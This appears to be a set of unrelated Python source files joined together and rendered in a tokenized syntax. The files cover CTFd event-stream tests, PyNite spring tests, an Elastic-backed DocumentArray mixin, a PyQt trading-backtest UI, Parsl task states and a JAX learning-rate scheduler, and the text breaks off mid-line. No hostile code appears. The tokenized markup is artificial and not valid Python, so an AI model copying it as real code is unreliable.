"type":"ping"}<assert_stmt>message.__str__().startswith("event:ping")<assert_stmt>len(event_manager.clients)<eq>1<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>saved_event<assert_stmt>message.__str__().startswith("event:notification\ndata:")<assert_stmt>len(event_manager.clients)<eq>1<block_end><block_end><def_stmt>test_event_manager_publish <block_start>"""Test that EventManager publishing to clients works"""<line_sep>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>event_manager=EventManager()<line_sep>q=defaultdict(Queue)<line_sep>event_manager.clients[id(q)]=q<line_sep>event_manager.publish(data=saved_data type="notification" channel="ctf")<line_sep>event=event_manager.clients[id(q)]["ctf"].get()<line_sep>event=ServerSentEvent(**event)<assert_stmt>event.data<eq>saved_data<block_end><def_stmt>test_event_endpoint_is_event_stream <block_start>"""Test that the /events endpoint is text/event-stream"""<line_sep>app=create_ctfd()<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" "data":saved_data}<line_sep>fake_queue.return_value=saved_event<with_stmt>app.app_context()<block_start>register_user(app)<with_stmt>login_as_user(app)<as>client<block_start>r=client.get("/events")<assert_stmt>"text/event-stream"<in>r.headers["Content-Type"]<block_end><block_end><block_end>destroy_ctfd(app)<block_end><def_stmt>test_redis_event_manager_installed <block_start>"""Test that RedisEventManager is installed on the Flask app"""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/1"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/1"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start><assert_stmt>isinstance(app.events_manager RedisEventManager)<block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_subscription <block_start>"""Test that RedisEventManager subscribing works."""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/2"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/2"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" "data":saved_data}<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>fake_queue.return_value=saved_event<line_sep>event_manager=RedisEventManager()<line_sep>events=event_manager.subscribe()<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>{"data":"" "type":"ping"}<assert_stmt>message.__str__().startswith("event:ping")<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>saved_event<assert_stmt>message.__str__().startswith("event:notification\ndata:")<block_end><block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_publish <block_start>"""Test that RedisEventManager publishing to clients works."""<class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/3"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/3"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>event_manager=RedisEventManager()<line_sep>event_manager.publish(data=saved_data type="notification" channel="ctf")<block_end>destroy_ctfd(app)<block_end><block_end><def_stmt>test_redis_event_manager_listen <block_start>"""Test that RedisEventManager listening pubsub works."""<line_sep># This test is nob currently working properly
# This test is sort of incomplete b/c we aren't also subscribing
# I wasnt able to get listening and subscribing to work at the same time
# But the code does work under gunicorn and serve.py
<try_stmt># import importlib
# from gevent.monkey import patch_time, patch_socket
# from gevent import Timeout
# patch_time()
# patch_socket()
<block_start><class_stmt>RedisConfig(TestingConfig)<block_start>REDIS_URL="redis://localhost:6379/4"<line_sep>CACHE_REDIS_URL="redis://localhost:6379/4"<line_sep>CACHE_TYPE="redis"<block_end><try_stmt><block_start>app=create_ctfd(config=RedisConfig)<block_end><except_stmt>ConnectionError<block_start>print("Failed to connect to redis. Skipping test.")<block_end><else_stmt><block_start><with_stmt>app.app_context()# saved_event = {
# "data": {
# "team_id": None,
# "user_id": None,
# "content": "asdf",
# "title": "asdf",
# "id": 1,
# "team": None,
# "user": None,
# "date": "2020-08-31T23:57:27.193081+00:00",
# "type": "toast",
# "sound": None,
# },
# "type": "notification",
# }
<block_start>event_manager=RedisEventManager()<line_sep># def disable_retry(f, *args, **kwargs):
# return f()
# with patch("tenacity.retry", side_effect=disable_retry):
# with Timeout(10):
# event_manager.listen()
event_manager.listen()<line_sep># event_manager.publish(
# data=saved_event["data"], type="notification", channel="ctf"
# )
<block_end>destroy_ctfd(app)<block_end><block_end><finally_stmt><block_start><pass><line_sep># import socket
# import time
# importlib.reload(socket)
# importlib.reload(time)
<block_end><block_end> |
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 <NAME>, SE; tamalone1
"""<import_stmt>unittest<import_from_stmt>PyNite FEModel3D<import_stmt>sys<import_from_stmt>io StringIO<class_stmt>Test_Spring_Elements(unittest.TestCase)<block_start>''' Tests of spring members.'''<def_stmt>setUp self# Suppress printed output temporarily
<block_start>sys.stdout=StringIO()<block_end><def_stmt>tearDown self# Reset the print function to normal
<block_start>sys.stdout=sys.__stdout__<block_end><def_stmt>test_spring_elements self# A First Course in the Finite Element Method, 4th Edition
# <NAME>
# Example 2.1
# Units for this model are pounds and inches
<block_start>system=FEModel3D()<line_sep>system.add_node('1' 0 0 0)<line_sep>system.add_node('2' 30 0 0)<line_sep>system.add_node('3' 10 0 0)<line_sep>system.add_node('4' 20 0 0)<line_sep># Add spring members
system.add_spring('S1' '1' '3' 1000)<line_sep>system.add_spring('S2' '3' '4' 2000)<line_sep>system.add_spring('S3' '4' '2' 3000)<line_sep># Define supports
system.def_support('1' <true> <true> <true> <true> <true> <true>)<line_sep>system.def_support('2' <true> <true> <true> <true> <true> <true>)<line_sep>system.def_support('3' <false> <true> <true> <true> <true> <true>)<line_sep>system.def_support('4' <false> <true> <true> <true> <true> <true>)<line_sep># Add node loads
system.add_node_load('4' 'FX' 5000)<line_sep>system.analyze(<true>)<line_sep># Check results
# correct_values = [('3', 0.9090909090909092),
# ('4', 1.3636363636363638),
# ('1', -909.0909090909091),
# ('2', -4090.9090909090914)]
n3_DX=system.Nodes['3'].DX['Combo 1']<line_sep>self.assertAlmostEqual(n3_DX/0.9090909090909092 1.0 2)<line_sep>n4_DX=system.Nodes['4'].DX['Combo 1']<line_sep>self.assertAlmostEqual(n4_DX/1.3636363636363638 1.0 2)<line_sep>n1_rxn=system.Nodes['1'].RxnFX['Combo 1']<line_sep>self.assertAlmostEqual(n1_rxn/-909.0909090909091 1.0 2)<line_sep>n2_rxn=system.Nodes['2'].RxnFX['Combo 1']<line_sep>self.assertAlmostEqual(n2_rxn/-4090.9090909090914 1.0 2)<block_end><block_end> |
<import_from_stmt>typing Union Iterable Dict<import_from_stmt>..base.seqlike BaseSequenceLikeMixin<import_from_stmt>.... Document<class_stmt>SequenceLikeMixin(BaseSequenceLikeMixin)<block_start>"""Implement sequence-like methods for DocumentArray with Elastic as storage"""<def_stmt>__eq__ self other<block_start>"""Compare this object to the other, returns True if and only if other
as the same type as self and other has the same meta information
:param other: the other object to check for equality
:return: ``True`` if other is equal to self
"""<line_sep># two DAW are considered as the same if they have the same client meta data
<return>(type(self)<is>type(other)<and>self._client.get_meta()<eq>other._client.get_meta()<and>self._config<eq>other._config)<block_end><def_stmt>__len__ self<block_start>"""Return the length of :class:`DocumentArray` that uses Elastic as storage
:return: the length of this :class:`DocumentArrayElastic` object
"""<try_stmt><block_start><return>self._client.count(index=self._config.index_name)["count"]<block_end><except_stmt><block_start><return>0<block_end><block_end><def_stmt>__contains__ self x:Union[str 'Document']<block_start>"""Check if ``x`` is contained in this :class:`DocumentArray` with Elastic storage
:param x: the id of the document to check or the document object itself
:return: True if ``x`` is contained in self
"""<if_stmt>isinstance(x str)<block_start><return>self._doc_id_exists(x)<block_end><elif_stmt>isinstance(x Document)<block_start><return>self._doc_id_exists(x.id)<block_end><else_stmt><block_start><return><false><block_end><block_end><def_stmt>__del__ self<block_start>"""Delete this :class:`DocumentArrayElastic` object"""<line_sep>self._save_offset2ids()<line_sep># if not self._persist:
# self._offset2ids.clear()
<block_end><def_stmt>__repr__ self<block_start>"""Return the string representation of :class:`DocumentArrayElastic` object
:return: string representation of this object
"""<line_sep><return>f'<{self.__class__.__name__} (length={len(self)}) at {id(self)}>'<block_end><def_stmt>_upload_batch self docs:Iterable['Document']<block_start>batch=[]<for_stmt>doc docs<block_start>batch.append(self._document_to_elastic(doc))<if_stmt>len(batch)<g>self._config.batch_size<block_start>self._send_requests(batch)<line_sep>self._refresh(self._config.index_name)<line_sep>batch=[]<block_end><block_end><if_stmt>len(batch)<g>0<block_start>self._send_requests(batch)<line_sep>self._refresh(self._config.index_name)<block_end><block_end><def_stmt>extend self docs:Iterable['Document']<block_start>docs=list(docs)<line_sep>self._upload_batch(docs)<line_sep>self._offset2ids.extend([doc.id<for>doc docs])<block_end><block_end> |
"""Ui."""<import_stmt>logging<import_stmt>logging.config<import_stmt>os.path<import_from_stmt>datetime datetime<import_from_stmt>PyQt5 QtCore QtGui<import_from_stmt>.lib EquityChart OptimizatimizedResultsTable OptimizationTable Portfolio QuotesChart ResultsTable Settings Symbol TradesTable get_quotes get_symbols strategies_from_file <line_sep>__all__=('MainWidget' )<line_sep>logger=logging.getLogger(__name__)<line_sep>DEFAULT_TICKER='AAPL'<line_sep>SYMBOL_COLUMNS=['Symbol' 'Security Name']<class_stmt>SymbolsLoaderThread(QtCore.QThread)<block_start>symbols_loaded=QtCore.pyqtSignal(object)<def_stmt>run self<block_start>symbols=get_symbols()<line_sep>self.symbols_loaded.emit(symbols[SYMBOL_COLUMNS].values)<block_end><block_end><class_stmt>DataTabWidget(QtGui.QWidget)<block_start>data_updated=QtCore.pyqtSignal(object)<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.select_source=QtGui.QTabWidget(self)<line_sep>self.select_source.setGeometry(210 50 340 200)<line_sep>self.init_shares_tab_ui()<line_sep>self.init_external_tab_ui()<line_sep>self.symbols_loader=SymbolsLoaderThread()<line_sep>self.symbols_loader.started.connect(self.on_symbols_loading)<line_sep>self.symbols_loader.symbols_loaded.connect(self.on_symbols_loaded QtCore.Qt.QueuedConnection)<line_sep>self.symbols_loader.start()<line_sep>self.date_from=self.shares_date_from.date().toPyDate()<line_sep>self.date_to=self.shares_date_to.date().toPyDate()<block_end><def_stmt>init_external_tab_ui self<block_start>"""External data."""<line_sep>self.external_tab=QtGui.QWidget()<line_sep>self.external_tab.setEnabled(<false>)<line_sep>self.external_layout=QtGui.QVBoxLayout(self.external_tab)<line_sep>self.import_data_name=QtGui.QLabel('Import External Data')<line_sep>self.import_data_label=QtGui.QLabel('...')<line_sep>self.import_data_btn=QtGui.QPushButton('Import')<line_sep>self.import_data_btn.clicked.connect(self.open_file)<line_sep>self.external_layout.addWidget(self.import_data_name 0 QtCore.Qt.AlignCenter)<line_sep>self.external_layout.addWidget(self.import_data_label 0 QtCore.Qt.AlignCenter)<line_sep>self.external_layout.addWidget(self.import_data_btn 0 QtCore.Qt.AlignCenter)<line_sep>self.select_source.addTab(self.external_tab 'Custom data')<block_end><def_stmt>init_shares_tab_ui self<block_start>"""Shares."""<line_sep>self.shares_tab=QtGui.QWidget()<line_sep>self.shares_layout=QtGui.QFormLayout(self.shares_tab)<line_sep>today=datetime.today()<line_sep>self.shares_date_from=QtGui.QDateEdit()<line_sep>self.shares_date_from.setMinimumDate(QtCore.QDate(1900 1 1))<line_sep>self.shares_date_from.setMaximumDate(QtCore.QDate(2030 12 31))<line_sep>self.shares_date_from.setDate(QtCore.QDate(today.year 1 1))<line_sep>self.shares_date_from.setDisplayFormat('dd.MM.yyyy')<line_sep>self.shares_date_to=QtGui.QDateEdit()<line_sep>self.shares_date_to.setMinimumDate(QtCore.QDate(1900 1 1))<line_sep>self.shares_date_to.setMaximumDate(QtCore.QDate(2030 12 31))<line_sep>self.shares_date_to.setDate(QtCore.QDate(today.year today.month today.day))<line_sep>self.shares_date_to.setDisplayFormat('dd.MM.yyyy')<line_sep>self.shares_symbol_list=QtGui.QComboBox()<line_sep>self.shares_symbol_list.setFocusPolicy(QtCore.Qt.StrongFocus)<line_sep>self.shares_symbol_list.setMaxVisibleItems(20)<line_sep>self.shares_symbol_list.setEditable(<true>)<line_sep>self.shares_show_btn=QtGui.QPushButton('Load')<line_sep>self.shares_show_btn.clicked.connect(self.update_data)<line_sep>self.shares_layout.addRow('From' self.shares_date_from)<line_sep>self.shares_layout.addRow('To' self.shares_date_to)<line_sep>self.shares_layout.addRow('Symbol' self.shares_symbol_list)<line_sep>self.shares_layout.addRow(<none> self.shares_show_btn)<line_sep>self.select_source.addTab(self.shares_tab 'Shares/Futures/ETFs')<block_end><def_stmt>on_symbols_loading self<block_start>self.shares_symbol_list.addItem('Loading...')<line_sep>self.shares_symbol_list.setEnabled(<false>)<block_end><def_stmt>on_symbols_loaded self symbols<block_start>self.shares_symbol_list.clear()<line_sep>self.shares_symbol_list.setEnabled(<true>)<line_sep># self.symbols = ['%s/%s' % (ticker, name) for ticker, name in symbols]
# self.shares_symbol_list.addItems(self.symbols)
model=QtGui.QStandardItemModel()<line_sep>model.setHorizontalHeaderLabels(SYMBOL_COLUMNS)<for_stmt>irow,(ticker name) enumerate(symbols)<block_start>model.setItem(irow 0 QtGui.QStandardItem(ticker))<line_sep>model.setItem(irow 1 QtGui.QStandardItem(name))<block_end>table_view=QtGui.QTableView()<line_sep>table_view.setModel(model)<line_sep>table_view.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)<line_sep>table_view.verticalHeader().setVisible(<false>)<line_sep>table_view.setAutoScroll(<false>)<line_sep>table_view.setShowGrid(<false>)<line_sep>table_view.resizeRowsToContents()<line_sep>table_view.setColumnWidth(0 60)<line_sep>table_view.setColumnWidth(1 240)<line_sep>table_view.setMinimumWidth(300)<line_sep>completer=QtGui.QCompleter(model)<line_sep>completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)<line_sep>completer.setModel(model)<line_sep>self.symbols=symbols<line_sep>self.shares_symbol_list.setModel(model)<line_sep>self.shares_symbol_list.setView(table_view)<line_sep>self.shares_symbol_list.setCompleter(completer)<line_sep># set default symbol
self.shares_symbol_list.setCurrentIndex(self.shares_symbol_list.findText(DEFAULT_TICKER))<block_end><def_stmt>open_file self<block_start>filename=QtGui.QFileDialog.getOpenFileName(parent=<none> caption='Open a source of data' directory=QtCore.QDir.currentPath() filter='All (*);;Text (*.txt)' )<line_sep>self.import_data_label.setText('Loading %s'%filename)<with_stmt>open(filename 'r' encoding='utf-8')<as>f<block_start>self.data=f.readlines()<block_end><block_end><def_stmt>update_data self ticker=<none><block_start>ticker=ticker<or>self.shares_symbol_list.currentText()<line_sep>self.symbol=Symbol(ticker=ticker mode=Symbol.SHARES)<line_sep>self.date_from=self.shares_date_from.date().toPyDate()<line_sep>self.date_to=self.shares_date_to.date().toPyDate()<line_sep>get_quotes(symbol=self.symbol.ticker date_from=self.date_from date_to=self.date_to )<line_sep>self.data_updated.emit(self.symbol)<block_end><block_end><class_stmt>StrategyBoxWidget(QtGui.QGroupBox)<block_start>run_backtest=QtCore.pyqtSignal(object)<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.setTitle('Strategy')<line_sep>self.setAlignment(QtCore.Qt.AlignCenter)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.list=QtGui.QComboBox()<line_sep>self.add_btn=QtGui.QPushButton('+')<line_sep>self.add_btn.clicked.connect(self.add_strategies)<line_sep>self.start_btn=QtGui.QPushButton('Start Backtest')<line_sep>self.start_btn.clicked.connect(self.load_strategy)<line_sep>self.layout.addWidget(self.list stretch=2)<line_sep>self.layout.addWidget(self.add_btn stretch=0)<line_sep>self.layout.addWidget(self.start_btn stretch=0)<line_sep>self.load_strategies_from_settings()<block_end><def_stmt>reload_strategies self<block_start>"""Reload user's file to get actual version of the strategies."""<line_sep>self.strategies=strategies_from_file(self.strategies_path)<block_end><def_stmt>reload_list self<block_start>self.list.clear()<line_sep>self.list.addItems([s.get_name()<for>s self.strategies])<block_end><def_stmt>load_strategies_from_settings self<block_start>filename=Settings.value('strategies/path' <none>)<if_stmt><not>filename<or><not>os.path.exists(filename)<block_start><return><block_end>self.strategies_path=filename<line_sep>self.reload_strategies()<line_sep>self.reload_list()<block_end><def_stmt>save_strategies_to_settings self<block_start>Settings.setValue('strategies/path' self.strategies_path)<block_end><def_stmt>add_strategies self<block_start>filename,_filter=QtGui.QFileDialog.getOpenFileName(self caption='Open Strategy.' directory=QtCore.QDir.currentPath() filter='Python modules (*.py)' )<if_stmt><not>filename<block_start><return><block_end>self.strategies_path=filename<line_sep>self.save_strategies_to_settings()<line_sep>self.reload_strategies()<line_sep>self.reload_list()<block_end><def_stmt>load_strategy self<block_start>self.reload_strategies()<line_sep>self.run_backtest.emit(self.strategies[self.list.currentIndex()])<block_end><block_end><class_stmt>QuotesTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QVBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.toolbar_layout=QtGui.QHBoxLayout()<line_sep>self.toolbar_layout.setContentsMargins(10 10 15 0)<line_sep>self.chart_layout=QtGui.QHBoxLayout()<line_sep>self.init_timeframes_ui()<line_sep>self.init_strategy_ui()<line_sep>self.layout.addLayout(self.toolbar_layout)<line_sep>self.layout.addLayout(self.chart_layout)<block_end><def_stmt>init_timeframes_ui self<block_start>self.tf_layout=QtGui.QHBoxLayout()<line_sep>self.tf_layout.setSpacing(0)<line_sep>self.tf_layout.setContentsMargins(0 12 0 0)<line_sep>time_frames=('1M' '5M' '15M' '30M' '1H' '1D' '1W' 'MN')<line_sep>btn_prefix='TF'<for_stmt>tf time_frames<block_start>btn_name=''.join([btn_prefix tf])<line_sep>btn=QtGui.QPushButton(tf)<line_sep># TODO:
btn.setEnabled(<false>)<line_sep>setattr(self btn_name btn)<line_sep>self.tf_layout.addWidget(btn)<block_end>self.toolbar_layout.addLayout(self.tf_layout)<block_end><def_stmt>init_strategy_ui self<block_start>self.strategy_box=StrategyBoxWidget(self)<line_sep>self.toolbar_layout.addWidget(self.strategy_box)<block_end><def_stmt>update_chart self symbol<block_start><if_stmt><not>self.chart_layout.isEmpty()<block_start>self.chart_layout.removeWidget(self.chart)<block_end>self.chart=QuotesChart()<line_sep>self.chart.plot(symbol)<line_sep>self.chart_layout.addWidget(self.chart)<block_end><def_stmt>add_signals self<block_start>self.chart.add_signals()<block_end><block_end><class_stmt>EquityTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_chart self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.chart)<block_end>self.chart=EquityChart()<line_sep>self.chart.plot()<line_sep>self.layout.addWidget(self.chart)<block_end><block_end><class_stmt>ResultsTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_table self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.table)<block_end>self.table=ResultsTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>TradesTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<block_end><def_stmt>update_table self<block_start><if_stmt><not>self.layout.isEmpty()<block_start>self.layout.removeWidget(self.table)<block_end>self.table=TradesTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>OptimizationTabWidget(QtGui.QWidget)<block_start>optimization_done=QtCore.pyqtSignal()<def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QVBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.table_layout=QtGui.QHBoxLayout()<line_sep>self.top_layout=QtGui.QHBoxLayout()<line_sep>self.top_layout.setContentsMargins(0 10 0 0)<line_sep>self.start_optimization_btn=QtGui.QPushButton('Start')<line_sep>self.start_optimization_btn.clicked.connect(self.start_optimization)<line_sep>self.top_layout.addWidget(self.start_optimization_btn alignment=QtCore.Qt.AlignRight)<line_sep>self.layout.addLayout(self.top_layout)<line_sep>self.layout.addLayout(self.table_layout)<block_end><def_stmt>update_table self strategy<block_start><if_stmt><not>self.table_layout.isEmpty()# close() to avoid an UI issue with duplication of the table
<block_start>self.table.close()<line_sep>self.table_layout.removeWidget(self.table)<block_end>self.table=OptimizationTable()<line_sep>self.table.plot(strategy)<line_sep>self.table_layout.addWidget(self.table)<block_end><def_stmt>start_optimization self *args **kwargs<block_start>logger.debug('Start optimization')<line_sep>self.table.optimize()<line_sep>self.optimization_done.emit()<line_sep>logger.debug('Optimization is done')<block_end><block_end><class_stmt>OptimizatimizedResultsTabWidget(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.layout=QtGui.QHBoxLayout(self)<line_sep>self.layout.setContentsMargins(0 0 0 0)<line_sep>self.table=OptimizatimizedResultsTable()<line_sep>self.table.plot()<line_sep>self.layout.addWidget(self.table)<block_end><block_end><class_stmt>MainWidget(QtGui.QTabWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>super().__init__(parent)<line_sep>self.setDocumentMode(<true>)<line_sep>self.data_tab=DataTabWidget(self)<line_sep>self.data_tab.data_updated.connect(self._update_quotes_chart)<line_sep>self.addTab(self.data_tab 'Data')<block_end><def_stmt>_add_quotes_tab self<block_start><if_stmt>self.count()<ge>2# quotes tab is already exists
<block_start><return><block_end>self.quotes_tab=QuotesTabWidget(self)<line_sep>self.quotes_tab.strategy_box.run_backtest.connect(self._run_backtest)<line_sep>self.addTab(self.quotes_tab 'Quotes')<block_end><def_stmt>_add_result_tabs self<block_start><if_stmt>self.count()<ge>3# tabs are already exist
<block_start><return><block_end>self.equity_tab=EquityTabWidget(self)<line_sep>self.results_tab=ResultsTabWidget(self)<line_sep>self.trades_tab=TradesTabWidget(self)<line_sep>self.optimization_tab=OptimizationTabWidget(self)<line_sep>self.optimization_tab.optimization_done.connect(self._add_optimized_results)<line_sep># noqa
self.addTab(self.equity_tab 'Equity')<line_sep>self.addTab(self.results_tab 'Results')<line_sep>self.addTab(self.trades_tab 'Trades')<line_sep>self.addTab(self.optimization_tab 'Optimization')<block_end><def_stmt>_update_quotes_chart self symbol<block_start>self._add_quotes_tab()<line_sep>self.symbol=symbol<line_sep>self.quotes_tab.update_chart(self.symbol)<line_sep>self.setCurrentIndex(1)<block_end><def_stmt>_run_backtest self strategy<block_start>logger.debug('Run backtest')<line_sep>Portfolio.clear()<line_sep>stg=strategy(symbols=[self.symbol])<line_sep>stg.run()<line_sep>Portfolio.summarize()<line_sep>self.quotes_tab.add_signals()<line_sep>self._add_result_tabs()<line_sep>self.equity_tab.update_chart()<line_sep>self.results_tab.update_table()<line_sep>self.trades_tab.update_table()<line_sep>self.optimization_tab.update_table(strategy=stg)<line_sep>logger.debug('Count positions in the portfolio: %d' Portfolio.position_count())<block_end><def_stmt>_add_optimized_results self<block_start>self.addTab(OptimizatimizedResultsTabWidget(self) 'Optimized Results')<line_sep>self.setCurrentIndex(self.count()-1)<block_end><def_stmt>plot_test_data self<block_start>logger.debug('Plot test data')<line_sep>self.data_tab.update_data(ticker=DEFAULT_TICKER)<line_sep>self.quotes_tab.strategy_box.load_strategy()<block_end><block_end> |
<import_from_stmt>enum IntEnum<class_stmt>States(IntEnum)<block_start>"""Enumerates the states a parsl task may be in.
These states occur inside the task record for a task inside
a `DataFlowKernel` and in the monitoring database.
In a single successful task execution, tasks will progress in this
sequence:
pending -> launched -> running -> exec_done
Other states represent deviations from this path, either due to
failures, or to deliberate changes to how tasks are executed (for
example due to join_app, or memoization).
All tasks should end up in one of the states listed in `FINAL_STATES`.
"""<line_sep>unsched=-1<line_sep>pending=0<line_sep>"""Task is known to parsl but cannot run yet. Usually, a task cannot
run because it is waiting for dependency tasks to complete.
"""<line_sep>running=2<line_sep>"""Task is running on a resource. This state is special - a DFK task
record never goes to States.running state; but the monitoring database
may represent a task in this state based on non-DFK information received
from monitor_wrapper."""<line_sep>exec_done=3<line_sep>"""Task has been executed successfully."""<line_sep>failed=4<line_sep>"""Task has failed and no more attempts will be made to run it."""<line_sep>dep_fail=5<line_sep>"""Dependencies of this task failed, so it is marked as failed without
even an attempt to launch it."""<line_sep>launched=7<line_sep>"""Task has been passed to a `ParslExecutor` for execution."""<line_sep>fail_retryable=8<line_sep>"""Task has failed, but can be retried"""<line_sep>memo_done=9<line_sep>"""Task was found in the memoization table, so it is marked as done
without even an attempt to launch it."""<line_sep>joining=10<line_sep>"""Task is a join_app, joining on internal tasks. The task has run its
own Python code, and is now waiting on other tasks before it can make
further progress (to a done/failed state)."""<block_end>FINAL_STATES=[States.exec_done States.memo_done States.failed States.dep_fail]<line_sep>"""States from which we will never move to another state, because the job has
either definitively completed or failed."""<line_sep>FINAL_FAILURE_STATES=[States.failed States.dep_fail]<line_sep>"""States which are final and which indicate a failure. This must
be a subset of FINAL_STATES"""<line_sep> |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code from different mains."""<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<line_sep>STEPS_PER_EPOCH=4500<def_stmt>create_learning_rate_scheduler factors='constant * linear_warmup * rsqrt_decay' base_learning_rate=0.5 warmup_steps=1000 decay_factor=0.5 steps_per_decay=20000 steps_per_cycle=100000 init_step=0 finetune_lr=<false><block_start>"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* rsqrt_normalized_decay: divide by square root of max(step/warmup_steps, 1)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: string, factors separated by "*" that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: int, how many steps to warm up for in the warmup schedule.
decay_factor: float, the amount to decay the learning rate by.
steps_per_decay: int, how often to decay the learning rate.
steps_per_cycle: int, steps per cycle when using cosine decay.
init_step: int, first step of this run. Used with finetune_lr
finetune_lr: bool, modify step count for finetuning smaller datasets
Returns:
a function learning_rate(step): float -> {"learning_rate": float}, the
step-dependent lr.
"""<line_sep>factors=[n.strip()<for>n factors.split('*')]<def_stmt>step_fn step<block_start>"""Step to learning rate function."""<line_sep>ret=1.0<if_stmt>finetune_lr<block_start>steps_this_run=step-init_step<line_sep>multiplier=STEPS_PER_EPOCH/steps_per_cycle<line_sep>finetune_steps=steps_this_run<times>multiplier<line_sep>step=init_step+finetune_steps<block_end><for_stmt>name factors<block_start><if_stmt>name<eq>'constant'<block_start>ret<augmul>base_learning_rate<block_end><elif_stmt>name<eq>'linear_warmup'<block_start>ret<augmul>jnp.minimum(1.0 step/warmup_steps)<block_end><elif_stmt>name<eq>'rsqrt_decay'<block_start>ret<augdiv>jnp.sqrt(jnp.maximum(step warmup_steps))<block_end><elif_stmt>name<eq>'rsqrt_normalized_decay'<block_start>ret<augmul>jnp.sqrt(warmup_steps)<line_sep>ret<augdiv>jnp.sqrt(jnp.maximum(step warmup_steps))<block_end><elif_stmt>name<eq>'decay_every'<block_start>ret<augmul>(decay_factor<power>(step<floordiv>steps_per_decay))<block_end><elif_stmt>name<eq>'cosine_decay'<block_start>progress=jnp.maximum(0.0 (step-warmup_steps)/float(steps_per_cycle))<line_sep>ret<augmul>jnp.maximum(0.0 0.5<times>(1.0+jnp.cos(jnp.pi<times>(progress%1.0))))<block_end><else_stmt><block_start><raise>ValueError('Unknown factor 